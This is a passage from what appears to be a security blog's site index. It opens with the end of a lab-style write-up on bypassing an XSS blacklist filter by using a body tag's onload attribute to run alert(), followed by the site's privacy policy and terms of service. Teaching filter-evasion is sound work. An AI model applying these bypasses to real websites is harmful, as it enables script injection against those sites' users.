payload string is loaded in the HTML response body.\nI can see that there is some kind of filter kept in place by the application that removes the word \u0026ldquo;script,\u0026rdquo; which breaks the HTML syntax, and the browser treats the following data as just text and displays back the partial string.\nCan we assume that the vulnerability is fixed? No\nThe developer leveraged a technique called \u0026ldquo;Blacklisting\u0026rdquo; to secure the application from exploiting the XSS vulnerability. However, this approach has limitations, and it can still be bypassed.\nTIP - 1 # HTML is case-insensitive, which means we can try it by changing it to upper case or small case letters or even combining small and upper case letters together, as given below.\nPayload Try 2: Case-Insensitive # Output:\nFigure 4: Second XSS Payload Result It looks like this technique also failed. The application seems to be filtering out the lowercase and uppercase script tags that were inserted.\nTIP - 2 # Javascript functions can be triggered for execution in multiple different ways, not necessarily that only the HTML script tag is needed all the time.\nOne of the ways to execute the javascript \u0026ldquo;alert()\u0026rdquo; function is using the HTML SVG tag, which is generally used for loading the vector graphics file on the HTML pages.\nExample:\nThe HTML Attribute \u0026ldquo;onload\u0026rdquo; is one of the special words used to control the behavior.\nIn the above example, the HTML attribute \u0026ldquo;onload\u0026rdquo; is assigned to a javascript function \u0026ldquo;alert()\u0026rdquo; which runs immediately when the HTML SVG tag is loaded.\nLet\u0026rsquo;s go ahead and check out the things in action.\nPayload Try 3: HTML5 Tags # Output:\nThis attempt also failed, as the application filters out multiple HTML tag strings. i.e., svg, script, img, etc.\nFrom the above example, we can see that the HTML attribute \u0026ldquo;onload\u0026rdquo; is being loaded without any filters and displayed back as keyed in.\nTIP - 3 # Not all HTML tag strings can be blacklisted. Some might break the entire HTML page itself and application functionality.\nFor example, the HTML Body tag is needed most to load the page\u0026rsquo;s content. HTML Style tag, which is used to beautify the page, etc.\nWe shall improvise the previously used payload with the HTML Body tag.\nPayload Try 4: HTML5 Tags # Output: pop-up message\nFigure 5: Fourth XSS Payload Alert yay!!! 🎉 This time, our XSS payload worked, and the application displayed the pop-up message.\nTo further confirm, Click \u0026ldquo;OK,\u0026rdquo; then right-click and select the \u0026ldquo;View page source\u0026rdquo; code to see how our payload was injected and aligned with the HTML response code.\nFigure 6: Fourth XSS Payload HTML Page Source You should be able to find out that our injected payload is rightly aligned, HTML attribute onload event is triggered immediately. Therefore it indeed executed the javascript code.\nThrough this, we have successfully solved the XSS challenge 3.\nSummary # In this article, we learned how poorly implemented validations can still be bypassed by improving the payload and trying different possible combinations. The blacklisting approach is helpful for a quick fix but is not foolproof, which must be updated whenever a new payload has been reported. Additionally, we covered many tips and techniques that can help you improvise your XSS identification skillset.\nKeep learning!! :D\n","date":"13 January 2023","externalUrl":null,"permalink":"/challenge-3-xss-bypass-blacklist-html-tags/","section":"Posts","summary":"","title":"Challenge 3 - XSS bypass blacklist HTML tags","type":"posts"},{"content":"Last Updated: 30th January 2026\nWho we are # SecurityArray is currently managed and maintained by the Eracorp Technologies Private Limited - Our website address is: https://securityarray.net/.\n1. Introduction # SecurityArray Managed and Owned by Eracorp Technologies Private Limited (\u0026ldquo;Portal\u0026rdquo; or \u0026ldquo;Company\u0026rdquo; or \u0026ldquo;We\u0026rdquo;) respect your privacy and are committed to protecting it through our compliance with this policy.\nThis policy describes how we collect, use, disclose, and protect the personal information of our customers and website users (\u0026ldquo;you\u0026rdquo;),describes the types of information we may collect from you or that you may provide when you visit the website securityarray.net(our \u0026ldquo;Website\u0026rdquo;), and our practices for collecting, using, maintaining, protecting, and disclosing that information.\nWe will only use your personal information in accordance with this policy unless otherwise required by applicable law. We take steps to ensure that the personal information that we collect about you is adequate, relevant, not excessive, and used for limited purposes.\nPrivacy laws in India generally define \u0026ldquo;personal information\u0026rdquo; as any information about an identifiable individual, which includes information that can be used on its own or with other information to identify, contact, or locate a single person. Personal information does not include business contact information, including your name, title, or business contact information.\nThis policy applies to information we collect, use, or disclose about our customers and Website users:\nOn this Website.\nIn email, text, and other electronic messages between you and this Website.\nWhen you interact with our advertising and applications on third-party websites and services if those applications or advertising include links to this policy.\nThe Website may include links to third-party websites, plug-ins, services, social networks, or applications. Clicking on those links or enabling those connections may allow the third party to collect or share data about you. If you follow a link to a third-party website or engage a third-party plugin, please note that these third parties have their own privacy policies and we do not accept any responsibility or liability for these policies. We do not control these third-party websites, and we encourage you to read the privacy policy of every website you visit.\nThis policy does not apply to information collected by:\nAny third party through any application or content (including advertising) that may link to or be accessible from the Website.\nPlease read this policy carefully to understand our policies and practices for collecting, processing, and storing your information. If you do not agree with our policies and practices, your choice is not to use our Website. By accessing or using this Website, you indicate that you understand, accept, and consent to the practices described in this policy. This policy may change from time to time (see CHANGES TO OUR PRIVACY POLICY). Your continued use of this Website after we make changes indicates that you accept and consent to those changes, so please check the policy periodically for updates.\n2. Information we collect about you # We collect and use several types of information from and about you, including:\nPersonal information, that we can reasonably use to directly or indirectly identify you, such as your name, mailing address, e-mail address, telephone number, Internet protocol (IP) address used to connect your computer to the Internet, user name or other similar identifier, billing and account information, and any other identifier we may use to contact you online or offline (\u0026ldquo;personal information\u0026rdquo;).\nWe provide an opportunity for any user to unsubscribe or opt-out of contact for marketing purposes on an ongoing basis by using the unsubscribe mechanism at the bottom of our emails, or by emailing to hello@securityarray.net.\nNon-personal information, that does not directly or indirectly reveal your identity or directly relate to an identified individual, such as demographic information, or statistical or aggregated information. Statistical or aggregated data does not directly identify a specific person, but we may derive non-personal statistical or aggregated data from personal information. For example, we may aggregate personal information to calculate the percentage of users accessing a specific Website feature.\nTechnical information, including your login information, browser type and version, time zone setting, browser plug-in types and versions, operating system and platform, or information about your internet connection, the equipment you use to access our Website, and usage details.\nNon-personal details about your Website interactions, including the full Uniform Resource Locators (URLs), clickstream to, through and from our Website (including date and time), products you viewed or searched for, page response times, download errors, length of visits to certain pages, page interaction information (such as scrolling, clicks, and mouse-overs), methods used to browse away from the page, or any phone number used to call our customer service number.\n3. How we collect information about you # We use different methods to collect your information, including through:\nDirect interactions with you when you provide it to us, for example, by filling in forms or corresponding with us by phone, email, or otherwise.\nUser contributions. You may also provide information for us to publish or display on public Website areas or transmit to other Website users or third parties.\nAutomated technologies or interactions, as you navigate through our Website. Information collected automatically may include usage details, IP addresses, and information collected through cookies, web beacons, and other tracking technologies.\nThrough our Company Affiliates\n4. Information you provide to us # The information we collect directly from you on or through our Website may include:\nInformation that you provide by filling in forms on our Website. This includes information provided at the time of registering to use our Website, subscribing to our service, posting material, and requesting further services. We may also ask you for when you report a problem with our Website.\nRecords and copies of your correspondence (including email addresses), if you contact us.\nYour responses to surveys that we might ask you to complete for business research purposes.\nDetails of transactions you carry out through our Website and of the fulfillment of your orders. You may be required to provide financial information before placing an order through our Website.\nYour search queries on the Website.\nYou may also provide information to be published or displayed (hereinafter, \u0026ldquo;posted\u0026rdquo;) on public areas of the Website or transmitted to other users of the Website or third parties (such as our Facebook Group) (collectively, \u0026ldquo;User Contributions\u0026rdquo;). Your User Contributions are posted on and transmitted to others at your own risk. Please be aware that no security measures are perfect. Additionally, we cannot control the actions of other users of the Website with whom you may choose to share your User Contributions. Therefore, we cannot and do not guarantee that unauthorized persons will not view your User Contributions.\n5. Information we collect through cookies and other automatic data collection technologies # As you navigate through and interact with our Website, we may use cookies or other automatic data collection technologies to collect certain information about your equipment, browsing actions, and patterns, including:\nDetails of your visits to our Website, including traffic data, location data, logs, and other communication data and the resources that you access and use on the Website.\nInformation about your computer and internet connection, including your IP address, operating system, and browser type.\nWe may also use these technologies to collect information about your online activities over time and across third-party websites or other online services (behavioral tracking).\nThe information we collect automatically helps us to improve our Website and to deliver a better and more personalized service, including by enabling us to:\nEstimate our audience size and usage patterns.\nStore information about your preferences, allowing us to customize our Website according to your individual interests.\nSpeed up your searches.\nRecognize you when you return to our Website.\nThe technologies we use for this automatic data collection may include:\nCookies (or browser cookies). A cookie is a small file placed on the hard drive of your computer. You may refuse to accept browser cookies by activating the appropriate setting on your browser. However, if you select this setting you may be unable to access certain parts of our Website. Unless you have adjusted your browser setting so that it will refuse cookies, our system will issue cookies when you direct your browser to our Website.\nFlash Cookies. Certain features of our Website may use local stored objects (or Flash cookies) to collect and store information about your preferences and navigation to, from, and on our Website. Flash cookies are not managed by the same browser settings that are used for browser cookies. For information about managing your privacy and security settings for Flash cookies, see CHOICES ABOUT HOW WE USE AND DISCLOSE YOUR INFORMATION.\nWeb Beacons. Pages of our Website and our emails may contain small electronic files known as web beacons (also referred to as clear gifs, pixel tags, and single-pixel gifs) that permit the Company, for example, to count users who have visited those pages or opened an email and for other related website statistics (for example, recording the popularity of certain website content and verifying system and server integrity).\n6. Third-party use of cookies and other tracking technologies # Some content or applications on the Website, including advertisements, are served by third parties, including advertisers, ad networks and servers, content providers, and application providers. These third parties may use cookies alone or in conjunction with web beacons or other tracking technologies to collect information about you when you use our Website. The information they collect may be associated with your personal information or they may collect information, including personal information, about your online activities over time and across different websites and other online services. They may use this information to provide you with interest-based (behavioural) advertising or other targeted content.\nWe do not control these third parties\u0026rsquo; tracking technologies or how they are used. If you have any questions about an advertisement or other targeted content, you should contact the responsible provider directly. For more information about how you can opt out of receiving targeted advertising from many providers, see CHOICES ABOUT HOW WE USE AND DISCLOSE YOUR INFORMATION.\n7. How we use your information # We use information that we collect about you or that you provide to us, including any personal information:\nTo present our Website and its contents to you.\nTo provide you with information, products, or services that you request from us.\nTo fulfill the purposes for which you provided the information or that were described when it was collected, or any other purpose for which you provide it.\nTo provide you with notices about your account, including expiration and renewal notices.\nTo carry out our obligations and enforce our rights arising from any contracts with you, including for billing and collection or to comply with legal requirements.\nTo notify you about changes to our Website or any products or services we offer or provide through it.\nTo improve our Website, products or services, marketing, or customer relationships and experiences.\nTo allow you to participate in interactive features, social media, or similar features on our Website or other websites.\nTo measure or understand the effectiveness of the advertising we serve to you and others, and to deliver relevant advertising to you.\nIn any other way we may describe when you provide the information. For any other purpose with your consent.\nWe may also use your information to contact you about our own services that may be of interest to you, as permitted by law. If you do not want us to use your information in this way, please, use the unsubscribe mechanism at the bottom of our emails or email us at hello@securityarray.net. For more information, see CHOICES ABOUT HOW WE USE AND DISCLOSE YOUR INFORMATION.\n8. Disclosure of your information # We may disclose personal information that we collect or you provide as described in this privacy policy:\nTo our subsidiaries and affiliates.\nIn accordance with applicable law, to a buyer or other successor in the event of a merger, divestiture, restructuring, reorganization, dissolution, or other sale or transfer of some or all of Eracorp Technologies Service assets, whether as a going concern or as part of bankruptcy, liquidation, or similar proceeding, in which personal information held by Eracorp technologies Private Limited about our customers and users is among the assets transferred.\nTo contractors, developers, service providers, and other third parties we use to support our business (such as analytics and search engine providers that assist us with Website improvement and optimization) and who are contractually obligated to keep personal information confidential, use it only for the purposes for which we disclose it to them, and to process the personal information with the same standards set out in this policy.\nTo fulfill the purpose for which you provide it.\nFor any other purpose disclosed by us when you provide the information. With your consent.\nWe may also disclose your personal information:\nTo comply with any court order, law, or legal process, including to respond to any government or regulatory request, in accordance with applicable law.\nTo enforce or apply our terms of use and other agreements, including for billing and collection purposes.\nIf we believe disclosure is necessary or appropriate to protect the rights, property, or safety of Eracorp Technologies, our customers, or others. This includes exchanging information with other companies and organizations for the purposes of fraud protection.\n9. Transferring your personal information # We may transfer personal information that we collect or that you provide as described in this policy to contractors, service providers, and other third parties we use to support our business (such as analytics and search engine providers that assist us with Website improvement and optimization) and who are contractually obligated to keep personal information confidential, use it only for the purposes for which we disclose it to them, and to process the personal information with the same standards set out in this policy.\nWe may process, store, and transfer your personal information in and to a foreign country, with different privacy laws that may or may not be as comprehensive as Indian law. In these circumstances, the governments, courts, law enforcement, or regulatory agencies of that country may be able to obtain access to your personal information through the laws of the foreign country. Whenever we engage a service provider, we require that its privacy and security standards adhere to this policy and applicable Indian privacy law.\nBy submitting your personal information or engaging with the Website, you consent to this transfer, storage, or processing.\n10. Choices about how we use and disclose your information # We strive to provide you with choices regarding the personal information you provide to us. We have created mechanisms to provide you with the following control over your information:\nTracking Technologies and Advertising. You can set your browser to refuse all or some browser cookies, or to alert you when cookies are being sent. To learn how you can manage your Flash cookie settings, visit the Flash player settings page on Adobe\u0026rsquo;s website. If you disable or refuse cookies, please note that some parts of this Website may not be accessible or may not function properly. For more information about tracking technologies, see INFORMATION WE COLLECT THROUGH COOKIES AND OTHER AUTOMATIC DATA COLLECTION TECHNOLOGIES.\nPromotional Offers from the Company. If you have opted in to receive certain emails from us but no longer wish to have your contact information used by the Company to promote our own or third parties\u0026rsquo; products or services, you can opt-out by sending us an email stating your request to hello@securityarray.io. If we have sent you a promotional email, you may unsubscribe by clicking the unsubscribe link we have included in the email. This opt-out does not apply to information provided to the Company as part of a product purchase, warranty registration, product service experience, or other transactions.\nWe do not control third parties\u0026rsquo; collection or use of your information to serve interest-based advertising. However, these third parties may provide you with ways to choose not to have your information collected or used in this way. You can opt out of several third party ad servers\u0026rsquo; and networks\u0026rsquo; cookies simultaneously by using an opt-out tool created by the Network Advertising Initiative. You can also access these websites to learn more about online behavioural advertising and how to stop websites from placing cookies on your device. Opting out of a network does not mean you will no longer receive online advertising. It does mean that the network from which you opted out will no longer deliver ads tailored to your web preferences and usage patterns.\n11. Data security # The security of your personal information is very important to us. We use physical, electronic, and administrative measures designed to secure your personal information from accidental loss and from unauthorized access, use, alteration, and disclosure. We store all information you provide to us behind firewalls on our secure servers. We use third party payment services providers to process all payments. Your personal information may be processed in various international jurisdictions which do not have the same level of security as offered in India, or your home jurisdiction.\nThe safety and security of your information also depends on you. Where we have given you (or where you have chosen) a password for access to certain parts of our Website, you are responsible for keeping this password confidential. We ask you not to share your password with anyone.\nUnfortunately, the transmission of information via the Internet is not completely secure. Although we do our best to protect your personal information, we cannot guarantee the security of your personal information transmitted to our Website. Any transmission of personal information is at your own risk. We are not responsible for circumvention of any privacy settings or security measures contained on the Website.\n12. Data retention # Except as otherwise permitted or required by applicable law or regulation, we will only retain your personal information for as long as necessary to fulfill the purposes we collected it for, including for the purposes of satisfying any legal, accounting, or reporting requirements. Under some circumstances we may anonymize your personal information so that it can no longer be associated with you. We reserve the right to use such anonymous and de-identified data for any legitimate business purpose without further notice to you or your consent.\n13. Users under the age of 18 # Our Website is not intended for children under 18 years of age. No one under age 18 may provide any information to the Website. We do not knowingly collect personal information from children under 18. If we learn we have collected or received personal information from a child under 18 without verification of parental consent, we will delete that information. If you believe we might have any information from or about a child under 18, please contact us at hello@securityarray.net.\n14. Accessing and correcting your personal information # It is important that the personal information we hold about you is accurate and current. Please keep us informed if your personal information changes. By law you have the right to request access to and to correct the personal information that we hold about you.\nYou can review and change your personal information by logging into webiste and visiting your account profile page.\nIf you want to review, verify, correct, or withdraw consent to the use of your personal information you may also send us an email at hello@securityarray.net to request access to, correct, or delete any personal information that you have provided to us. We may not accommodate a request to change information if we believe the change would violate any law or legal requirement or cause the information to be incorrect.\nWe may request specific information from you to help us confirm your identity and your right to access, and to provide you with the personal information that we hold about you or make your requested changes. Applicable law may allow or require us to refuse to provide you with access to some or all of the personal information that we hold about you, or we may have destroyed, erased, or made your personal information anonymous in accordance with our record retention obligations and practices. If we cannot provide you with access to your personal information, we will inform you of the reasons why, subject to any legal or regulatory restrictions.\nWe will provide access to your personal information, subject to exceptions set out in applicable privacy legislation. Examples of such exceptions include:\nInformation protected by solicitor-client privilege.\nInformation that is part of a formal dispute resolution process.\nInformation that is about another individual that would reveal their personal information or confidential commercial information.\nInformation that is prohibitively expensive to provide.\nIf you are concerned about our response or would like to correct the information provided, you may contact our Privacy Officer at hello@securityarray.net.\nProper access and use of information provided on the Website, including User Contributions, is governed by our terms of use, or any third-party policy if the contribution is made on another website.\n15. Withdrawing your consent # Where you have provided your consent to the collection, use, and transfer of your personal information, you may have the legal right to withdraw your consent under certain circumstances. To withdraw your consent, if applicable, contact us at hello@securityarray.io. Please note that if you withdraw your consent we may not be able to provide you with a particular product or service. We will explain the impact to you the time to help you with your decision.\n16. Changes to our privacy policy # It is our policy to post any changes we make to our privacy policy on this page. If we make material changes to how we treat our users\u0026rsquo; personal information, we will notify you through a notice on the Website home page. We include the date the privacy policy was last revised at the top of the page. You are responsible for ensuring we have an up-to-date, active, and deliverable email address for you, and for periodically visiting our Website and this privacy policy to check for any changes.\n17. Contact Information and challenging compliance # We welcome your questions, comments, and requests regarding this privacy policy and our privacy practices. Please contact us at:\nAttn: Privacy Officer at hello@securityarray.net\nWe have procedures in place to receive and respond to complaints or inquiries about our handling of personal information, our compliance with this policy, and with applicable privacy laws. To discuss our compliance with this policy please contact our Privacy Officer using the contact information listed above.\n","date":"2 September 2021","externalUrl":null,"permalink":"/privacy/","section":"SecurityArray","summary":"","title":"Privacy","type":"page"},{"content":"Terms of Service (\u0026ldquo;Terms\u0026rdquo;)\nOur Terms of Service were last updated on 30th January 2026.\nPlease read these terms and conditions carefully before using Our Service.\nInterpretation and Definitions # Interpretation # The words in which the initial letter is capitalized have meanings defined under the following conditions. The following definitions shall have the same meaning regardless of whether they appear in singular or in the plural.\nDefinitions # For the purposes of these Terms of Service:\n\u0026ldquo;Account\u0026rdquo; means a unique account created for You to access our Service or parts of our Service.\n\u0026ldquo;Portal\u0026rdquo; (referred to as either \u0026ldquo;the Company\u0026rdquo;, \u0026ldquo;We\u0026rdquo;, \u0026ldquo;Us\u0026rdquo; or \u0026ldquo;Our\u0026rdquo; in this Agreement) refers to SecurityArray Portal.\n\u0026ldquo;Country\u0026rdquo; refers to India.\n\u0026ldquo;Content\u0026rdquo; refers to content such as text, images, or other information that can be posted, uploaded, linked to, or otherwise made available by You, regardless of the form of that content.\n\u0026ldquo;Device\u0026rdquo; means any device that can access the Service such as a computer, a cell phone, or a digital tablet.\n\u0026ldquo;Feedback\u0026rdquo; means feedback, innovations, or suggestions sent by You regarding the attributes, performance, or features of our Service.\n\u0026ldquo;Service\u0026rdquo; refers to the Website.\n\u0026ldquo;Terms of Service\u0026rdquo; (also referred to as \u0026ldquo;Terms\u0026rdquo;) mean these Terms of Service that form the entire agreement between You and the Company regarding the use of the Service.\n\u0026ldquo;Third-party Social Media Service\u0026rdquo; means any services or content (including data, information, products or services) provided by a third party that may be displayed, included, or made available by the Service.\n\u0026ldquo;Website\u0026rdquo; refers to SecurityArray, accessible from https://securityarray.net/\n\u0026ldquo;You\u0026rdquo; means the individual accessing or using the Service, or the company, or other legal entity on behalf of which\nsuch individual is accessing or using the Service, as applicable.\nAcknowledgment # These are the Terms of Service governing the use of this Service and the agreement that operates between You and the Company. These Terms of Service set out the rights and obligations of all users regarding the use of the Service.\nYour access to and use of the Service is conditioned on Your acceptance of and compliance with these Terms of Service. These Terms of Service apply to all visitors, users, and others who access or use the Service.\nBy accessing or using the Service You agree to be bound by these Terms of Service. If You disagree with any part of these Terms of Service then You may not access the Service.\nYou represent that you are over the age of 18. The Portal does not permit those under 18 to use the Service.\nYour access to and use of the Service is also conditioned on Your acceptance of and compliance with the Privacy Policy of the Portal. Our Privacy Policy describes Our policies and procedures on the collection, use, and disclosure of Your personal information when You use the Application or the Website and tells You about Your privacy rights and how the law protects You. Please read Our Privacy Policy carefully before using Our Service.\nUser Accounts When You create an account with Us, You must provide Us with information that is accurate, complete, and current at all times. Failure to do so constitutes a breach of the Terms, which may result in immediate termination of Your account on Our Service.\nYou are responsible for safeguarding the password that You use to access the Service and for any activities or actions under Your password, whether Your password is with Our Service or a Third-Party Social Media Service.\nYou agree not to disclose Your password to any third party. You must notify Us immediately upon becoming aware of any breach of security or unauthorized use of Your account.\nYou may not use as a username the name of another person or entity or that is not lawfully available for use, a name or trademark that is subject to any rights of another person or entity other than You without appropriate authorization, or a name that is otherwise offensive, vulgar or obscene.\nContent # Your Right to Post Content\nOur Service allows You to post Content. You are responsible for the Content that You post to the Service, including its legality, reliability, and appropriateness.\nBy posting Content to the Service, You grant Us the right and license to use, modify, publicly perform, publicly display, reproduce, and distribute such Content on and through the Service. You retain any and all of Your rights to any Content You submit, post, or display on or through the Service and You are responsible for protecting those rights. You agree that this license includes the right for Us to make Your Content available to other users of the Service, who may also use Your Content subject to these Terms.\nYou represent and warrant that: (i) the Content is Yours (You own it) or You have the right to use it and grant Us the rights and license as provided in these Terms, and (ii) the posting of Your Content on or through the Service does not violate the privacy rights, publicity rights, copyrights, contract rights or any other rights of any person.\nContent Restrictions # The Company is not responsible for the content of the Service\u0026rsquo;s users. You expressly understand and agree that You are solely responsible for the Content and for all activity that occurs under your account, whether done so by You or any third person using Your account. You may not transmit any Content that is unlawful, offensive, upsetting, intended to disgust, threaten, libelous, defamatory, obscene, or otherwise objectionable. Examples of such objectionable Content include, but are not limited to, the following:\nUnlawful or promoting unlawful activity. Defamatory, discriminatory, or mean-spirited content, including references or commentary about religion, race, sexual orientation, gender, national/ethnic origin, or other targeted groups. Spam, machine \u0026ndash; or randomly \u0026ndash; generated, constituting unauthorized or unsolicited advertising, chain letters, any other form of unauthorized solicitation, or any form of lottery or gambling. Containing or install any viruses, worms, malware, trojan horses, or other content that is designed or intended to disrupt, damage, or limit the functioning of any software, hardware or telecommunications equipment or to damage or obtain unauthorized access to any data or other information of a third person. Infringing on any proprietary rights of any party, including patent, trademark, trade secret, copyright, right of publicity or other rights. Impersonating any person or entity including the Company and its employees or representatives. ●Violating the privacy of any third person. False information and features. The Portal reserves the right, but not the obligation, to, in its sole discretion, determine whether or not any Content is appropriate and complies with this Terms, refuse or remove this Content. The Portal further reserves the right to make formatting and edits and change the manner of any Content. The Portal can also limit or revoke the use of the Service if You post such objectionable Content. As the Portal cannot control all content posted by users and/or third parties on the Service, you agree to use the Service at your own risk. You understand that by using the Service You may be exposed to content that You may find offensive, indecent, incorrect, or objectionable, and You agree that under no circumstances will the Portal be liable in any way for any content, including any errors or omissions in any content, or any loss or damage of any kind incurred as a result of your use of any content.\nContent Backups # Although regular backups of Content are performed, the Portal does not guarantee there will be no loss or corruption of data. Corrupt or invalid backup points may be caused by, without limitation, Content that is corrupted prior to being backed up or that changes during the time a backup is performed.\nThe Portal will provide support and attempt to troubleshoot any known or discovered issues that may affect the backups of Content. But You acknowledge that the Portal has no liability related to the integrity of Content or the failure to successfully restore Content to a usable state.\nYou agree to maintain a complete and accurate copy of any Content in a location independent of the Service.\nCopyright Policy # Intellectual Property Infringement\nWe respect the intellectual property rights of others. It is Our policy to respond to any claim that Content posted on the Service infringes a copyright or other intellectual property infringement of any person.\nIf You are a copyright owner or authorized on behalf of one, and You believe that the copyrighted work has been copied in a way that constitutes copyright infringement that is taking place through the Service, You must submit Your notice in writing to the attention of our copyright agent via email hello@securityarray.net and include in Your notice a detailed description of the alleged infringement.\nYou may be held accountable for damages (including costs and attorneys\u0026rsquo; fees) for misrepresenting that any Content is infringing Your copyright.\nDMCA Notice and DMCA Procedure for Copyright Infringement Claims # You may submit a notification pursuant to the Digital Millennium Copyright Act (DMCA) by providing our Copyright Agent with the following information in writing (see 17 U.S.C 512(c)(3) for further detail):\nAn electronic or physical signature of the person authorized to act on behalf of the owner of the copyright\u0026rsquo;s interest. A description of the copyrighted work that You claim has been infringed, including the URL (i.e., web page address) of the location where the copyrighted work exists or a copy of the copyrighted work. Identification of the URL or other specific location on the Service where the material that You claim is infringing is located. ●Your address, telephone number, and email address. A statement by You that You have a good faith belief that the disputed use is not authorized by the copyright owner, its agent, or the law. A statement by You, made under penalty of perjury, that the above information in Your notice is accurate and that You are the copyright owner or authorized to act on the copyright owner\u0026rsquo;s behalf. You can contact our copyright agent via email hello@securityarray.net. Upon receipt of notification, the Portal will take whatever action, in its sole discretion, it deems appropriate, including removal of the challenged content from the Service.\nIntellectual Property # The Service and its original content (excluding Content provided by You or other users), features, and functionality are and will remain the exclusive property of the Portal and its licensors. The Service is protected by copyright, trademark, and other laws of both the Country and foreign countries. Our trademarks and trade dress may not be used in connection with any product or service without the prior written consent of the Company.\nYour Feedback to Us # You assign all rights, title, and interest in any Feedback You provide to the Portal. If for any reason such assignment is ineffective, You agree to grant the Portal a non-exclusive, perpetual, irrevocable, royalty-free, worldwide right and license to use, reproduce, disclose, sub-license, distribute, modify and exploit such Feedback without restriction.\nLinks to Other Websites # Our Service may contain links to third-party websites or services that are not owned or controlled by the Portal. The Portal has no control over and assumes no responsibility for, the content, privacy policies, or practices of any third-party websites or services. You further acknowledge and agree that the Portal shall not be responsible or liable, directly or indirectly, for any damage or loss caused or alleged to be caused by or in connection with the use of or reliance on any such content, goods, or services available on or through any such websites or services.\nWe strongly advise You to read the terms and conditions and privacy policies of any third-party websites or services that You visit.\nTermination We may terminate or suspend Your Account immediately, without prior notice or liability, for any reason whatsoever, including without limitation if You breach these Terms of Service.\nUpon termination, Your right to use the Service will cease immediately. If You wish to terminate Your Account, You may simply discontinue using the Service.\nLimitation of Liability Notwithstanding any damages that You might incur, the entire liability of the Portal and any of its suppliers under any provision of this Terms and Your exclusive remedy for all of the foregoing shall be limited to the amount actually paid by You through the Service or anything through the Service.\nTo the maximum extent permitted by applicable law, in no event shall the Portal or its suppliers be liable for any special, incidental, indirect, or consequential damages whatsoever (including, but not limited to, damages for loss of profits, loss of data or other information, business interruption, for personal injury, loss of privacy arising out of or in any way related to the use of or inability to use the Service, third-party software and/or third-party hardware used with the Service, or otherwise in connection with any provision of this Terms), even if the Portal or any supplier has been advised of the possibility of such damages and even if the remedy fails of its essential purpose.\nSome states do not allow the exclusion of implied warranties or limitation of liability for incidental or consequential damages, which means that some of the above limitations may not apply. In these states, each party\u0026rsquo;s liability will be limited to the greatest extent permitted by law.\nMutual understanding # Misunderstanding is possible in all contractual relationships. Imagine the disaster if you expect to receive payment for materials before building a product but the customer believes payment is not due until delivery. If you do not have the prepayment terms in writing, it makes it difficult to enforce terms in your best interest.\nThe same is true with service or product quality, deadlines for completion or delivery, and returns and refunds. If a client can review these terms before purchasing your product or service, everyone enters the transaction informed. This prevents misunderstandings that can lead to dispute resolution procedures later.\nLicense and Site Access # We grant you a limited license to access and make personal use of this website. You are not allowed to download or modify it. This may be done only with written consent from us.\n\u0026ldquo;AS IS\u0026rdquo; and \u0026ldquo;AS AVAILABLE\u0026rdquo; Disclaimer\nThe Service is provided to You \u0026ldquo;AS IS\u0026rdquo; and \u0026ldquo;AS AVAILABLE\u0026rdquo; and with all faults and defects without warranty of any kind. To the maximum extent permitted under applicable law, the Portal, on its own behalf and on behalf of its Affiliates and its and their respective licensors and service providers, expressly disclaims all warranties, whether express, implied, statutory or otherwise, with respect to the Service, including all implied warranties of merchantability, fitness for a particular purpose, title and non-infringement, and warranties that may arise out of course of dealing, course of performance, usage or trade practice.\nWithout limitation to the foregoing, the Portal provides no warranty or undertaking, and makes no representation of any kind that the Service will meet Your requirements, achieve any intended results, be compatible or work with any other software, applications, systems or services, operate without interruption, meet any performance or reliability standards or be error free or that any errors or defects can or will be corrected.\nWithout limiting the foregoing, neither the Portal nor any of the portal providers makes any representation or warranty of any kind, express or implied: (i) as to the operation or availability of the Service, or the information, content, and materials or products included thereon; (ii) that the Service will be uninterrupted or error-free; (iii) as to the accuracy, reliability, or currency of any information or content provided through the Service; or (iv) that the Service, its servers, the content, or e-mails sent from or on behalf of the portal are free of viruses, scripts, trojan horses, worms, malware, timebombs or other harmful components.\nSome jurisdictions do not allow the exclusion of certain types of warranties or limitations on applicable statutory rights of a consumer, so some or all of the above exclusions and limitations may not apply to You. But in such a case the exclusions and limitations set forth in this xsection shall be applied to the greatest extent enforceable under applicable law.\nGoverning Law The laws of the Country, excluding its conflicts of law rules, shall govern this Terms and Your use of the Service. Your use of the Application may also be subject to other local, state, national, or international laws.\nDisputes Resolution # If You have any concerns or disputes about the Service, You agree to first try to resolve the dispute informally by contacting the Portal.\nFor European Union (EU) Users If You are a European Union consumer, you will benefit from any mandatory provisions of the law of the country in which you are resident in.\nIndia Legal Compliance You represent and warrant that (i) You are not located in a country that is subject to India or that has been designated by the Indian government as a \u0026ldquo;terrorist supporting\u0026rdquo; country, and (ii) You are not listed on any Indian government list of prohibited or restricted parties.\nSeverability and Waiver # Severability\nIf any provision of these Terms is held to be unenforceable or invalid, such provision will be changed and interpreted to accomplish the objectives of such provision to the greatest extent possible under applicable law and the remaining provisions will continue in full force and effect.\nWaiver Except as provided herein, the failure to exercise a right or to require performance of an obligation under these Terms shall not effect a party\u0026rsquo;s ability to exercise such right or require such performance at any time thereafter nor shall the waiver of a breach constitute a waiver of any subsequent breach.\nChanges to These Terms of Service # We reserve the right, at Our sole discretion, to modify or replace these Terms at any time. If a revision is material We will make reasonable efforts to provide at least 30 days notice prior to any new terms taking effect. What constitutes a material change will be determined at Our sole discretion.\nBy continuing to access or use Our Service after those revisions become effective, You agree to be bound by the revised terms. If You do not agree to the new terms, in whole or in part, please stop using the website and the Service.\nContact Us If you have any questions about these Terms of Service, You can contact us:\nBy visiting this page on our website: https://securityarray.net/about/ By sending us an email: hello@securityarray.net ","date":"5 August 2022","externalUrl":null,"permalink":"/terms-of-service/","section":"SecurityArray","summary":"","title":"Terms of Service","type":"page"},{"content":"","date":"28 September 2024","externalUrl":null,"permalink":"/categories/artificial-intelligence/","section":"Categories","summary":"","title":"Artificial Intelligence","type":"categories"},{"content":"","date":"28 September 2024","externalUrl":null,"permalink":"/categories/","section":"Categories","summary":"","title":"Categories","type":"categories"},{"content":"","date":"28 September 2024","externalUrl":null,"permalink":"/posts/","section":"Posts","summary":"","title":"Posts","type":"posts"},{"content":"","date":"28 September 2024","externalUrl":null,"permalink":"/","section":"SecurityArray","summary":"","title":"SecurityArray","type":"page"},{"content":"","date":"7 May 2024","externalUrl":null,"permalink":"/categories/cms/","section":"Categories","summary":"","title":"CMS","type":"categories"},{"content":"","date":"7 May 2024","externalUrl":null,"permalink":"/tags/security/","section":"Tags","summary":"","title":"Security","type":"tags"},{"content":"","date":"7 May 2024","externalUrl":null,"permalink":"/tags/","section":"Tags","summary":"","title":"Tags","type":"tags"},{"content":"","date":"7 May 